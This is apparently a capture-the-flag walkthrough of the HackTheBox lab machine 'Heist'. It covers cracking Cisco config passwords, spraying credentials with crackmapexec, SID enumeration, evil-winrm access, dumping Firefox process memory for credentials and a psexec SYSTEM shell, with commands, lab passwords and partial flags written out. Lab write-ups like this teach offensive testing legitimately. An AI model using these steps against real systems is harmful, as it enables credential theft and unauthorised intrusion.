HackTheBox — Heist Walkthrough
Summary
This is a write up for a fairly easy machine on hackthebox.eu named Heist. The machine required a lot of brute-force with password discovered. We start of with a config files where we find a few passwords and username. We brute-force through to get a valid, then brute-force SIDs’ to get more users and use them to get a shell, then after some digging we find a unusual program, dumping the process get credentials. Again a bit of brute-forcing gives us access to the administrator account. Let’s get going.
Recon
We start off with a nmap scan.
nmap -sC -sV -oA nmap/initial 10.10.1.149Looking at the results:
# Nmap 7.80 scan initiated Sat Mar 14 09:21:08 2020 as: nmap -sC -sV -oA nmap/initial 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 2m41s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-14T13:24:33
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 14 09:22:28 2020 -- 1 IP address (1 host up) scanned in 80.16 seconds
We got a couple of ports open. Let’s run a full nmap scan and see if we have missed anything.
nmap -sC -sV -p- -oA nmap/full 10.10.10.149Looking at the full-port scan results:
# Nmap 7.80 scan initiated Sat Mar 14 17:03:52 2020 as: nmap -sC -sV -p- -oA nmap/full 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.20s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 2m42s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-14T22:13:15
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 14 18:11:08 2020 -- 1 IP address (1 host up) scanned in 4035.81 seconds
We got a few more ports. Port 5985 looks quite interesting, it is the default port for Windows Remote Manager, with a valid user we can exploit the program and get a remote shell.
For now, lets have a look at port 80. Visiting the application, we get:
A login page, we tried some default username and password but it asks for an email. As, we don’t have and email we cannot brute force. But this gives us an access to the portal as a guest. Let’s go in through that.
Logging in through guest we see that there is an issue created by Hazard, this can be a potential user. We save the username in a file and move on to explore a bit more. We observe that there is an attachment, let’s go through it.
It is a config file.
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input sshWe can see that there are a few passwords in the list. It is Cisco type 7 password, it can be cracked. We will be using ciscot7, to crack the passwords. Along with that we get a few more usernames: rout3r and admin, we proceed to add them to our usernames list. We also have a secret 5 hash, which is a md5 hash, we can try to use hashcat to crack the password.
Let’s start with the type 7 password. We start by cloning the GitHub repository.
git clone https://github.com/theevilbit/ciscot7.gitLet’s get in to the repository and crack the passwords.
cd ciscot7
python3 ciscot7.py -d -p 0242114B0E143F015F5D1E161713
python3 ciscot7.py -d -p 02375012182C1A1D751618034F36415408
We get two passwords, let’s add them to our password list.
Let’s crack the secret 5 with hashcat.
hashcat -m 500 heist_hash /usr/share/wordlists/rockyou.txt --forceAnd we get a password. Let’s add this too , to our password list.
Next, we will go on to use crackmapexec to see if we have any valid username and password combination. I prefer the bleeding edge version of the tool. We can follow the wiki to install it to our machine. After the installation is complete, we can move on to enumerate users.
crackmapexec -u users.txt -p passwords.txt --shares 10.10.10.149We get only one valid user: Hazard
Let’s check if Hazard has access to winRM. We will be using evil-winrm to check. We need to install the gem file to match the dependencies.
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
gem install winrm winrm-fs stringioNow copy the evil-winrm.rb to the working directory and we will run and check.
ruby evil-winrm.rb -i 10.10.10.149 -u hazard -p stealth1agentBut we cannot get authorized.
Initial Foothold
We cannot get authorized but we have at least one valid user. We can leverage this get more users using rpcclient.
rpcclient -U 'hazard%stealth1agent' 10.10.10.149Now we can lookupnames, which will give us SIDs’, which we can leverage to brute force and get more users on the box. SIDs’ are unique security identifier to identify users. It can be of variable length and can be broken-up into three pieces.
S-1-5-21-4254423774-1266059056-3197185112–500
S-1–5 — this defines the identifier authority
21–4254423774–1266059056–3197185112 — this is domain specific identifier
500 — Identifies the user (500 default for administrator)
More information can be found here.
Now, we can look into our results.
We get a few more users: Administrator, Jason, Chase, support. Let’s add them to our users list and see if we can get any more valid users. We can also automate the process of finding valid users using lookupsuid from impacket.
python3 lookupsid.py hazard:stealth1agent@10.10.10.149
Make sure you remove the valid username password combination from the username and password file respectively as carckmapexec stops as soon as it hits a valid user. Running the command again with updated list.
crackmapexec -u users.txt -p passwords.txt --shares 10.10.10.149Looking at the results we find Chase as another valid user.
Let’s try evil-winrm with Chase’s credentials.
ruby evil-winrm.rb -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'And voila we get a shell.
Enumeration
Let’s dig around and see how we can escalate to administrator.
In the desktop folder we can todo.txt. Looking at it we can’t find anything interesting.
Let’s look at Programs Installed. We can see that there is Mozilla Firefox installed, which is not a default program. We can look at the process if it is running.
Let’s get the processes running. We can see that Firefox is running. Let’s dump the process.
To dump the process we can user procdump64.exe from sysinternals suite by Microsoft. This gives you an advantage as you don’t have to get in trouble with the signatures. Upload procdump64.exe to the remote machine.
uplaod procdump64.exe (in remote shell)Then run,
./procdump64.exe -accepteula -ma 1264Where 1264 is the process id. As we get from the previous command.
Download the process dump to local machine.
download firefox.exe_200315_044138.dmpIt might take a while as it is large file (~292 MB).
We can now run strings to the dumpfile and check for strings as passwords and all.
strings firefox.exe_200315_044138.dmp | grep password
Now we have an email-id: admin@support.htb and password: 4dD!5}x/re8]FBuZ. We can use this to login to the portal and see if we have anything extra. Alas! there is nothing.
Privilege Escalation
Let’s move ahead and add the password to the password list and remove the previously matched ones and run crackmapexec again.
crackmapexec -u users.txt -p passwords.txt --shares 10.10.10.149Looking at the output we can see it says administrator. It says pwned, which generally suggests that it has Read and Write access to the $ADMIN and $C shares, from where we can execute psexec.py from impacket and get a reverse-shell.
Let us try that.
python3 psexec.py administrator@10.10.10.149Voila! We have a shell as “nt authority/system”.
Flags
PS C:\Users\Administrator\Desktop> gc root.txt
gc root.txt
50dfa3c6bfd..3d766897
PS C:\Users\Administrator\Desktop> gc C:\users\chase\desktop\user.txt
c C:\users\chase\desktop\user.txt
a127daef77a..295f59c4
This was a small write-up on Heist.
~m1kU
